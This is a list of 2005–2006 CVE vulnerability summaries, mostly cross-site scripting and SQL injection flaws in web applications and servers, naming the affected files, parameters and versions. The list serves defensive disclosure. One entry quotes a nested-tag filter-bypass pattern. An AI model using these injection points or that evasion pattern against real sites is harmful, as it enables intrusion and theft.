[CVE-2006-0119] Multiple unspecified vulnerabilities in IBM Lotus Notes and Domino Server before 6.5.5 have unknown impact and attack vectors, due to "potential security issues" as identified by SPR numbers (1) GPKS6C9J67 in Agents, (2) JGAN6B6TZ3 and (3) KSPR699NBP in the Router, (4) GPKS5YQGPT in Security, or (5) HSAO6BNL6Y in the Web Server. NOTE: vector 3 is related to an issue in NROUTER in IBM Lotus Notes and Domino Server before 6.5.4 FP1, 6.5.5, and 7.0, which allows remote attackers to cause a denial of service (CPU consumption) via a crafted vCal meeting request sent via SMTP (aka SPR# KSPR699NBP).
[CVE-2006-0116] Cross-site scripting vulnerability in search.inetstore in iNETstore Ebusiness Software 2.0 allows remote attackers to inject arbitrary web script or HTML via the searchterm parameter.
[CVE-2006-0112] Cross-site scripting (XSS) vulnerability in index.php in Enhanced Simple PHP Gallery 1.7 allows remote attackers to inject arbitrary web script or HTML via the dir parameter.
[CVE-2006-0111] Cross-site scripting vulnerability in index.php in Boxcar Media Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the (1) parent or (2) pg parameter.
[CVE-2006-0110] Cross-site scripting (XSS) vulnerability in escribir.php in Foro Domus 2.10 allows remote attackers to inject arbitrary web script via the email parameter.
[CVE-2006-0109] Cross-site scripting vulnerability in category.php in Modular Merchant Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2006-0103] TinyPHPForum 3.6 and earlier stores the (1) users/[USERNAME].hash and (2) users/[USERNAME].email files under the web root with insufficient access control, which allows remote attackers to list all registered users and possibly obtain other sensitive information.
[CVE-2006-0102] Cross-site scripting (XSS) vulnerability in TinyPHPForum (TPF) 3.6 and earlier allows remote attackers to inject arbitrary web script via a javascript: scheme in an "[a]" bbcode tag, possibly the txt parameter to action.php.
[CVE-2006-0101] Multiple cross-site scripting (XSS) vulnerabilities in sBLOG 0.7.1 Beta 20051202 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) p and (2) keyword parameters in (a) index.php and (b) search.php.
[CVE-2006-0093] Cross-site scripting (XSS) vulnerability in index.php in @Card ME PHP allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2006-0091] Cross-site scripting (XSS) vulnerability in webmail in Open-Xchange 0.8.1-6 and earlier, with "Inline HTML" enabled, allows remote attackers to inject arbitrary web script or HTML via e-mail attachments, which are rendered inline.
[CVE-2006-0086] Cross-site scripting vulnerability in index.php in Next Generation Image Gallery 0.0.1 Lite Edition allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-0084] Cross-site scripting vulnerability in index.php in raSMP 2.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the $_SERVER[HTTP_USER_AGENT] variable (User-Agent header).
[CVE-2006-0080] Cross-site scripting (XSS) vulnerability in vBulletin 3.5.2, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the title of an event, which is not properly filtered by (1) calendar.php and (2) reminder.php.
[CVE-2006-0078] Multiple cross-site scripting (XSS) vulnerabilities in B-net Software 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) shout variables to (a) shout.php, or the (3) title and (4) message variables to (b) guestbook.php.
[CVE-2006-0073] Cross-site scripting (XSS) vulnerability in DiscusWare Discus Freeware 3.10.5 and Professional 3.10.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a URL, which is not properly sanitized from the resulting error message. NOTE: the provenance of this information is unknown.
[CVE-2006-0069] Cross-site scripting (XSS) vulnerability in addentry.php in Chipmunk Guestbook 1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the homepage parameter.
[CVE-2006-0065] SQL injection vulnerability in (1) functions.php, (2) functions_update.php, and (3) functions_display.php in VEGO Web Forum 1.26 and earlier allows remote attackers to execute arbitrary SQL commands via the theme_id parameter in index.php.
[CVE-2006-0063] Cross-site scripting (XSS) vulnerability in phpBB 2.0.19, when "Allowed HTML tags" is enabled, allows remote attackers to inject arbitrary web script or HTML via a permitted HTML tag with ' (single quote) characters and active attributes such as onmouseover, a variant of CVE-2005-4357.
[CVE-2006-0044] Unspecified vulnerability in context.py in Albatross web application toolkit before 1.33 allows remote attackers to execute arbitrary commands via unspecified vectors involving template files and the "handling of submitted form fields".
[CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7.
[CVE-2006-0015] Cross-site scripting (XSS) vulnerability in _vti_bin/_vti_adm/fpadmdll.dll in Microsoft FrontPage Server Extensions 2002 and SharePoint Team Services allows remote attackers to inject arbitrary web script or HTML, then leverage the attack to execute arbitrary programs or create new accounts, via the (1) operation, (2) command, and (3) name parameters.
[CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207.
[CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression.
[CVE-2005-4880] Jax Guestbook 3.1 and 3.31 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain IP addresses of users via a direct request to (1) guestbook, (2) guestbook_ips2block, (3) ips2block, and (4) formmailer/logfile.csv.
[CVE-2005-4879] Multiple cross-site scripting (XSS) vulnerabilities in jax_guestbook.php in Jax Guestbook 3.1 and 3.31 allow remote attackers to inject arbitrary web script or HTML via the (1) gmt_ofs and (2) language parameters. NOTE: the page parameter is already covered by CVE-2006-1913. NOTE: it was later reported that 3.50 is also affected.
[CVE-2005-4878] Multiple cross-site scripting (XSS) vulnerabilities in (1) acid_qry_main.php in Analysis Console for Intrusion Databases (ACID) 0.9.6b20 and (2) base_qry_main.php in Basic Analysis and Security Engine (BASE) 1.2, and unspecified other console scripts in these products, allow remote attackers to inject arbitrary web script or HTML via the sig[1] parameter and possibly other parameters, a different vulnerability than CVE-2007-6156.
[CVE-2005-4877] Cross-site scripting (XSS) vulnerability in the login form (login.jsp) of the admin console in Openfire (formerly Wildfire) 2.3.0 Beta 2 allows remote attackers to inject arbitrary web script or HTML via Javascript events in the username parameter, a different vulnerability than CVE-2005-4876.
[CVE-2005-4876] Cross-site scripting (XSS) vulnerability in the login form (login.jsp) of the admin console in Openfire (formerly Wildfire) 2.2.2, and possibly other versions before 2.3.0 Beta 2, allows remote attackers to inject arbitrary web script or HTML via the username parameter, a different vulnerability than CVE-2005-4877.
[CVE-2005-4874] The XMLHttpRequest object in Mozilla 1.7.8 supports the HTTP TRACE method, which allows remote attackers to obtain (1) proxy authentication passwords via a request with a "Max-Forwards: 0" header or (2) arbitrary local passwords on the web server that hosts this object.
[CVE-2005-4859] mimicboard2 (Mimic2) 086 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for mimic2.dat.
[CVE-2005-4858] Multiple cross-site scripting (XSS) vulnerabilities in mimic2.cgi in mimicboard2 (Mimic2) 086 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified parameters associated with the (1) name, (2) title, and (3) comment sections, as demonstrated by referencing a remote document through the SRC attribute of an IFRAME element.
[CVE-2005-4856] The admin interface in eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051110 does not properly handle authorization errors, which allows remote attackers to obtain sensitive information and see the admin pagelayout and associated templates via a request with (1) "anything after the url" or (2) a "wrong url".
[CVE-2005-4838] Multiple cross-site scripting (XSS) vulnerabilities in the example web applications for Jakarta Tomcat 5.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) el/functions.jsp, (2) el/implicit-objects.jsp, and (3) jspx/textRotate.jspx in examples/jsp2/, as demonstrated via script in a request to snp/snoop.jsp. NOTE: other XSS issues in the manager were simultaneously reported, but these require admin access and do not cross privilege boundaries.
[CVE-2005-4835] The ath_rate_sample function in the ath_rate/sample/sample.c sample code in MadWifi before 0.9.3 allows remote attackers to cause a denial of service (failed KASSERT and system crash) by moving a connected system to a location with low signal strength, and possibly other vectors related to a race condition between interface enabling and packet transmission.
[CVE-2005-4834] IBM WebSphere Application Server (WAS) 5.0.2.5 through 5.1.1.3 allows remote attackers to obtain JSP source code and other sensitive information, related to incorrect request processing by the web container.
[CVE-2005-4833] IBM WebSphere Application Server (WAS) 6.0 before 20050201, when serving pages in an Application WAR or an Extended Document Root, allows remote attackers to obtain the JSP source code and other sensitive information via "a specific JSP URL," related to lack of normalization of the URL format.
[CVE-2005-4824] PHP remote file inclusion vulnerability in web/classes.php in Siteframe before 3.2.2 allows remote attackers to execute arbitrary PHP code via a URL in the LOCAL_PATH parameter, a different vulnerability than CVE-2005-1965.
[CVE-2005-4823] Buffer overflow in the HP HTTP Server 5.0 through 5.95 of the HP Web-enabled Management Software allows remote attackers to execute arbitrary code via unknown vectors.
[CVE-2005-4819] Cross-site scripting (XSS) vulnerability in Lotus Domino versions before 6.5.4 fix pack 1 (FP1) and versions before 7.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-4806] Multiple unspecified vulnerabilities in Sun Java System Web Proxy Server 3.6 SP7 and earlier allow remote attackers to cause a denial of service (unresponsive service) via unknown vectors.
[CVE-2005-4804] Unspecified vulnerability in Sun Java System Application Server Platform Edition and Enterprise Edition 8.1 2005 Q1, and Platform Edition UR1, allows remote attackers to read .jar files via unknown vectors related to deployed web applications.
[CVE-2005-4801] Multiple cross-site request forgery (CSRF) vulnerabilities in Yet Another PHP Image Gallery (YaPIG) 0.95b and earlier allow remote attackers to perform unauthorized actions as a logged-in user, as demonstrated by tricking the administrator to access a web page that performs a mod_info action in modify_gallery.php.
[CVE-2005-4799] Multiple cross-site scripting (XSS) vulnerabilities in Yet Another PHP Image Gallery (YaPIG) 0.95b and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the Homepage field (aka the Website field) in an "image-related comment" and (2) the img_size field in view.php. NOTE: due to lack of details from the researcher, it is not clear whether the comment vector overlaps CVE-2005-1886.
[CVE-2005-4793] Multiple unspecified vulnerabilities in the web utility function in Hitachi Cm2/Network Node Manager and JP1/Cm2/Network Node Manager before 20050930 allow attackers to execute arbitrary commands, disable services, and "exploit vulnerabilities."
[CVE-2005-4792] SQL injection vulnerability in index.php in Appalachian State University phpWebSite 0.10.1 and earlier allows remote attackers to execute arbitrary SQL commands via the module parameter. NOTE: the provenance of this information is unknown.
[CVE-2005-4789] resmgr in SUSE Linux 9.2 and 9.3, and possibly other distributions, does not properly enforce class-specific exclude rules in some situations, which allows local users to bypass intended access restrictions for USB devices that set their class ID at the interface level.
[CVE-2005-4787] ** DISPUTED ** Turnkey Web Tools SunShop Shopping Cart allows remote attackers to obtain sensitive information via a phpinfo action to (1) index.php, (2) admin/index.php, and (3) admin/adminindex.php, which executes the PHP phpinfo function. NOTE: The vendor has disputed this issue, saying that "Having this in the code makes it easier for us to troubleshoot when issues arise on individual carts. For someone to have a script to do this type of search would require that they know where your shop is actually located. I dont think it really can be construde [sic] as a security issue."
[CVE-2005-4785] Cross-site scripting (XSS) vulnerability in QuickBlogger 1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) author ("your name") and (2) "comment" section.
[CVE-2005-4780] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in Fidra Lighthouse CMS 1.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter in a query_string to the home page. NOTE: The vendor disputes this issue, saying "Lighthouse does not in any way make use of the PHP technology. [It] is an application server ... A technology like this cannot be susceptible to client-side cross-site-scripting-attacks on its own, but only applications created based on such a technology. This does not only apply to Lighthouse, but also to Perl, PHP or web applications based on Java Servlet technology." Since the original researcher is known to test demo pages and is sometimes inaccurate, it is likely that this issue will be REJECTED.
[CVE-2005-4774] Cross-site scripting (XSS) vulnerability in Xerver 4.17 allows remote attackers to inject arbitrary web script or HTML after a /%00/ sequence at the end of the URI.
[CVE-2005-4767] BEA WebLogic Server and WebLogic Express 8.1 SP5 and earlier, and 7.0 SP6 and earlier, when using username/password authentication, do not lock out a username after the maximum number of invalid login attempts, which makes it easier for remote attackers to guess the password.
[CVE-2005-4766] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, and 7.0 SP5 and earlier, do not encrypt multicast traffic, which might allow remote attackers to read sensitive cluster synchronization messages by sniffing the multicast traffic.
[CVE-2005-4765] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier and 7.0 SP6 and earlier, when using the weblogic.Deployer command with the t3 protocol, do not use the secure t3s protocol even when an Administration port is enabled on the Administration server, which might allow remote attackers to sniff the connection.
[CVE-2005-4764] BEA WebLogic Server and WebLogic Express 9.0, 8.1, and 7.0 lock out the admin user account after multiple incorrect password guesses, which allows remote attackers who know or guess the admin account name to cause a denial of service (blocked admin logins).
[CVE-2005-4763] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier, when Internet Inter-ORB Protocol (IIOP) is used, sometimes include a password in an exception message that is sent to a client or stored in a log file, which might allow remote attackers to perform unauthorized actions.
[CVE-2005-4762] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier sometimes store the boot password in the registry in cleartext, which might allow local users to gain administrative privileges.
[CVE-2005-4761] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP5 and earlier, and 6.1 SP7 and earlier log the Java command line at server startup, which might include sensitive information (passwords or keyphrases) in the server log file when the -D option is used.
[CVE-2005-4760] BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier, and 7.0 SP5 and earlier, when fullyDelegatedAuthorization is enabled for a servlet, do not cause servlet deployment to fail when failures occur in authorization or role providers, which might prevent the servlet from being "fully protected."
[CVE-2005-4759] BEA WebLogic Server and WebLogic Express 8.1 and 7.0, during a migration across operating system platforms, do not warn the administrative user about platform differences in URLResource case sensitivity, which might cause local users to inadvertently lose protection of Web Application pages.
[CVE-2005-4758] Unspecified vulnerability in the Administration server in BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier allows remote authenticated Admin users to read arbitrary files via unknown attack vectors related to an "internal servlet" accessed through HTTP.
[CVE-2005-4757] BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier, and 7.0 SP5 and earlier, do not properly "constrain" a "/" (slash) servlet root URL pattern, which might allow remote attackers to bypass intended servlet protections.
[CVE-2005-4756] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, and 7.0 SP5 and earlier, do not properly validate derived Principals with multiple PrincipalValidators, which might allow attackers to gain privileges.
[CVE-2005-4755] BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier (1) stores the private key passphrase (CustomTrustKeyStorePassPhrase) in cleartext in nodemanager.config
[CVE-2005-4754] BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier allow remote attackers to obtain sensitive information (intranet IP addresses) via unknown attack vectors involving "network address translation."
[CVE-2005-4753] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, and 7.0 SP6 and earlier, in certain "heavy usage" scenarios, report incorrect severity levels for an audit event, which might allow attackers to perform unauthorized actions and avoid detection.
[CVE-2005-4752] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, and 7.0 SP6 and earlier, might allow local users to gain privileges by using the run-as deployment descriptor element to change the privileges of a web application or EJB from the Deployer security role to the Admin security role.
[CVE-2005-4751] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Server and WebLogic Express 9.0, 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier allow remote attackers to inject arbitrary web script or HTML and gain administrative privileges via unknown attack vectors.
[CVE-2005-4750] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP5 and earlier, and 6.1 SP7 and earlier allow remote attackers to cause a denial of service (server thread hang) via unknown attack vectors.
[CVE-2005-4749] HTTP request smuggling vulnerability in BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier allows remote attackers to inject arbitrary HTTP headers via unspecified attack vectors.
[CVE-2005-4747] Cross-site scripting (XSS) vulnerability in WebHost Automation Ltd Helm before 3.2.6 allows remote attackers to inject arbitrary web script or HTML via unknown vectors involving the default page.
[CVE-2005-4734] Stack-based buffer overflow in IISWebAgentIF.dll in RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 and 5.3 for IIS allows remote attackers to execute arbitrary code via a long url parameter in the Redirect method.
[CVE-2005-4732] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Tux Racer TuxBank 0.7x and 0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) description parameters.
[CVE-2005-4727] Cross-site scripting (XSS) vulnerability in gbook.cgi in gBook before 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header field.
[CVE-2005-4721] Cross-site scripting (XSS) vulnerability in search.cfm in tmsPUBLISHER 3.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-4707] Multiple cross-site scripting (XSS) vulnerabilities in PHP GEN before 1.3 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2005-4705] BEA WebLogic Server and WebLogic Express 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7, when a Java client application creates an SSL connection to the server after it has already created an insecure connection, will use the insecure connection, which allows remote attackers to sniff the connection.
[CVE-2005-4704] Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 8.1 through SP3, 7.0 through SP6, and 6.1 through SP7, when SSL is intended to be used, causes an unencrypted protocol to be used in certain unspecified circumstances, which causes user credentials to be sent across the network in cleartext and allows remote attackers to gain privileges.
[CVE-2005-4698] Cross-site scripting (XSS) vulnerability in TellMe 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) q_IP (IP) or (2) q_Host (HOST) parameters.
[CVE-2005-4697] The Microsoft Wireless Zero Configuration system (WZCS) allows local users to access WEP keys and pair-wise Master Keys (PMK) of the WPA pre-shared key via certain calls to the WZCQueryInterface API function in wzcsapi.dll.
[CVE-2005-4694] Unspecified vulnerability in the www_add method in Asset.pm in Plain Black WebGUI 6.3.0 and other versions before 6.7.6 allows attackers to execute arbitrary code via unknown attack vectors.
[CVE-2005-4685] Firefox and Mozilla can associate a cookie with multiple domains when the DNS resolver has a non-root domain in its search list, which allows remote attackers to trick a user into accepting a cookie for a hostname formed via search-list expansion of the hostname entered by the user, or steal a cookie for an expanded hostname, as demonstrated by an attacker who operates an ap1.com Internet web site to steal cookies associated with an ap1.com.example.com intranet web site.
[CVE-2005-4684] Konqueror can associate a cookie with multiple domains when the DNS resolver has a non-root domain in its search list, which allows remote attackers to trick a user into accepting a cookie for a hostname formed via search-list expansion of the hostname entered by the user, or steal a cookie for an expanded hostname, as demonstrated by an attacker who operates an ap1.com Internet web site to steal cookies associated with an ap1.com.example.com intranet web site.
[CVE-2005-4682] Cross-site scripting (XSS) vulnerability in error.asp in AudienceView allows remote attackers to inject arbitrary web script or HTML via the TSerrorMessage parameter. NOTE: the provenance of this information is unknown.
[CVE-2005-4675] Cross-site scripting (XSS) vulnerability in list.php in Complete PHP Counter allows remote attackers to inject arbitrary web script or HTML via the c parameter.
[CVE-2005-4672] Cross-site scripting (XSS) vulnerability in image-editor-52/index.php in CityPost Simple Image-Editor 0.52 allows remote attackers to inject arbitrary web script or HTML via the (1) m1, (2) m2, (3) m3, (4) imgsrc, and (5) m4 parameter.
[CVE-2005-4671] Cross-site scripting (XSS) vulnerability in simple-upload-53.php in CityPost Simple PHP Upload 5.3 allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2005-4670] Cross-site scripting (XSS) vulnerability in message.php in CityPost Automated Link Exchange (LNKX) allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2005-4669] SQL injection vulnerability in RT Internet Solutions (RTIS) WebAdmin allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password fields.
[CVE-2005-4665] Cross-site scripting (XSS) vulnerability in PunBB 1.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via Javascript contained in nested, malformed BBcode url tags.
[CVE-2005-4663] Cross-site scripting (XSS) vulnerability in OcoMon 1.20, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2005-4655] Cross-site scripting (XSS) vulnerability in submit.php in PHP-Fusion 6.0.204 allows remote attackers to inject arbitrary web script or HTML via nested tags in the news_body parameter, as demonstrated by elements such as "<me<meta>ta" and "<sc<script>ript>".
[CVE-2005-4649] Multiple cross-site scripting (XSS) vulnerabilities in Advanced Guestbook 2.2 and 2.3.1 allow remote attackers to inject arbitrary web script or HTML via (1) the entry parameter in index.php and (2) the gb_id parameter in comment.php. NOTE: The index.php/entry vector might be resultant from CVE-2005-1548.
[CVE-2005-4644] Cross-site scripting (XSS) vulnerability in the HTML WikiProcessor in Edgewall Trac 0.9.2 allows remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of an IMG tag.
[CVE-2005-4642] Multiple cross-site scripting (XSS) vulnerabilities in HydroBB 1.0.0 Beta 2 allow remote attackers to inject arbitrary web script or HTML via the s parameter to (1) search.php, (2) members.php, (3) stats.php, (4) viewforum.php, (5) register.php, (6) usercp.php, (7) groups.php, (8) pms.php, and (9) calendar.php.
[CVE-2005-4637] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kayako SupportSuite 3.00.26 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) nav parameter in the downloads module, (2) Full Name and (3) Email fields in the core module, (4) Full Name, (5) Email, and (6) Subject fields in the tickets module, or (7) Registered Email field in the lostpassword feature in the core module.
[CVE-2005-4627] Cross-site scripting (XSS) vulnerability in index.php in (1) GmailSite 1.0 through 1.0.4 and (2) GFHost 0.1.1 through 0.4.2 allows remote attackers to inject arbitrary web script or HTML via the lng parameter.
[CVE-2005-4626] The default configuration of Recruitment Software installs admin/site.xml under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information (MySQL database credentials) via a direct request.
[CVE-2005-4621] Cross-site scripting (XSS) vulnerability in the editavatar page in vBulletin 3.5.1 allows remote attackers to inject arbitrary web script or HTML via a URL in the remote avatar url field, in which the URL generates a parsing error, and possibly requiring a trailing extension such as .jpg.
[CVE-2005-4613] Cross-site scripting (XSS) vulnerability in VUBB alpha rc1 allows remote attackers to inject arbitrary web script or HTML via unspecified fields in the user edit profile.
[CVE-2005-4607] Cross-site scripting (XSS) vulnerability in index.php in BugPort 1.147 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) ids[0], (2) action, (3) report_id, (4) devWherePair[1][1], and (5) binds[0] parameters.
[CVE-2005-4606] SQL injection vulnerability in check_user.asp in multiple Web Wiz products including (1) Site News 3.06 and earlier, (2) Journal 1.0 and earlier, (3) Polls 3.06 and earlier, and (4) Database Login 1.71 and earlier allows remote attackers to execute arbitrary SQL commands via the txtUserName parameter.
[CVE-2005-4603] Cross-site scripting (XSS) vulnerability in printthread.php in MyBB 1.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a thread message, which is not properly sanitized in the print view of the thread.
[CVE-2005-4599] Cross-site scripting (XSS) vulnerability in tiny_mce_gzip.php in TinyMCE Compressor PHP before 1.06 allows remote attackers to inject arbitrary web script or HTML via the index parameter.
[CVE-2005-4598] Cross-site scripting (XSS) vulnerability in home.php in OoApp Guestbook 2.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2005-4597] Cross-site scripting (XSS) vulnerability in index.php in iPei Guestbook 1.7 allows remote attackers to inject arbitrary web script or HTML via the email parameter, as used by the email field, when signing a guestbook.
[CVE-2005-4596] Cross-site scripting (XSS) vulnerability in read.php in AdesGuestbook 2.0 allows remote attackers to inject arbitrary web script or HTML via the totalRows_rsRead parameter.
[CVE-2005-4588] Cross-site scripting (XSS) vulnerability in Koobi 5 allows remote attackers to inject arbitrary web script or HTML via nested, malformed url BBCode tags. NOTE: the provenance of this information is unknown.
[CVE-2005-4582] Electric Sheep 2.6.3 does not require authentication or integrity checks from the server to the client, which allows remote attackers to download and display arbitrary MPEG movie files via (1) DNS spoofing, (2) a URL on the command line, or (3) a URL in the configuration file. NOTE: the same attack vectors apply to common web browsers that are able to communicate with untrusted web servers, and other problems related to DNS design issues. Therefore this may not be a specific vulnerability. However, a client would reasonably expect to receive content only from the server.
[CVE-2005-4580] Cross-site scripting (XSS) vulnerability in Day Communique 4 allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search.
[CVE-2005-4577] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in an unspecified input form.
[CVE-2005-4576] Multiple cross-site scripting (XSS) vulnerabilities in the UpdateEngine program in Fatwire UpdateEngine 6.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) COUNTRYNAME, (2) EMAIL, and (3) FUELAP_TEMPLATENAME parameters.
[CVE-2005-4574] Cross-site scripting (XSS) vulnerability in loader.cfm in PaperThin CommonSpot Content Server 4.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the bNewWindow parameter.
[CVE-2005-4571] Cross-site scripting (XSS) vulnerability in myEZshop Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the Keyword parameter. NOTE: the provenance of this information is unknown.
[CVE-2005-4567] Multiple cross-site scripting (XSS) vulnerabilities in FTGate Technology (formerly known as Floosietek) FTGate 4.4 (Build 4.4.000 Oct 26 2005) allow remote attackers to inject arbitrary web script or HTML by sending (1) the href parameter to index.fts, or the param1 parameter to (2) /domains/index.fts, (3) /config/licence.fts, or (4) /config/systemacl.fts.
[CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com.
[CVE-2005-4559] mail/include.html in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly initialize the default_layout and layout_settings variables when an unrecognized HTTP_USER_AGENT string is provided, which allows remote attackers to access arbitrary files via a request with an unrecognized User Agent that also specifies the desired default_layout and layout_settings parameters.
[CVE-2005-4558] IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.
[CVE-2005-4557] dir/include.html in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, allows remote attackers to include arbitrary local files via a null byte (%00) in the lang parameter, possibly due to a directory traversal vulnerability.
[CVE-2005-4556] PHP remote file include vulnerability in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, when register_globals is enabled, allows remote attackers to include arbitrary local and remote PHP files via a URL in the (1) lang_settings and (2) language parameters in (a) accounts/inc/include.php and (b) admin/inc/include.php.
[CVE-2005-4555] Cross-site scripting (XSS) vulnerability in add.php in DEV web management system 1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) ENTER_ARTICLE_TITLE, (2) SPECIFY_ZONE, (3) ENTER_ARTICLE_HEADER, and (4) ENTER_ARTICLE_BODY indices in the language array parameter.
[CVE-2005-4554] Multiple SQL injection vulnerabilities in DEV web management system 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat parameter in an openforum action (openforum.php) in index.php, (2) cat parameter in getfile.php, and (3) target parameter in download_now.php.
[CVE-2005-4551] Cross-site scripting (XSS) vulnerability in sign.php in codegrrl SimpBook 1.0, when html_enable is on, allows remote attackers to inject arbitrary web script or HTML via the message parameter to index.php.
[CVE-2005-4549] Cross-site scripting (XSS) vulnerability in Oracle Application Server (OracleAS) Discussion Forum Portlet allows remote attackers to inject arbitrary web script or HTML via the (1) RowKeyValue parameter in the PORTAL schema
[CVE-2005-4545] Cross-site scripting (XSS) vulnerability in search.asp in NetDirect ShopEngine allows remote attackers to inject arbitrary web script or HTML via the EXPS parameter. NOTE: the provenance of this information is unknown
[CVE-2005-4530] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft EPay Enterprise 3.0 (formerly DoPays) allow remote attackers to inject arbitrary web script or HTML via multiple unspecified parameters in (1) profile.htm, (2) card.htm, (3) bank.htm, (4) subscriptions.htm, (5) send.htm, (6) request.htm, (7) forgot.htm, (8) escrow.htm, (9) donations.htm, and (10) products.htm.
[CVE-2005-4526] Clearswift MIMEsweeper For Web (a.k.a. WEBsweeper) 4.0 through 5.1 allows remote attackers to bypass filtering via a URL that does not include a .exe extension but returns an executable file.
[CVE-2005-4522] Multiple cross-site scripting (XSS) vulnerabilities in the view_filters_page.php filters script in Mantis 1.0.0rc3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) view_type and (2) target_field parameters.
[CVE-2005-4516] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Fusion 6.00.200 through 6.00.300 allow remote attackers to inject arbitrary web script or HTML via (1) the sortby parameter in members.php and (2) IMG tags.
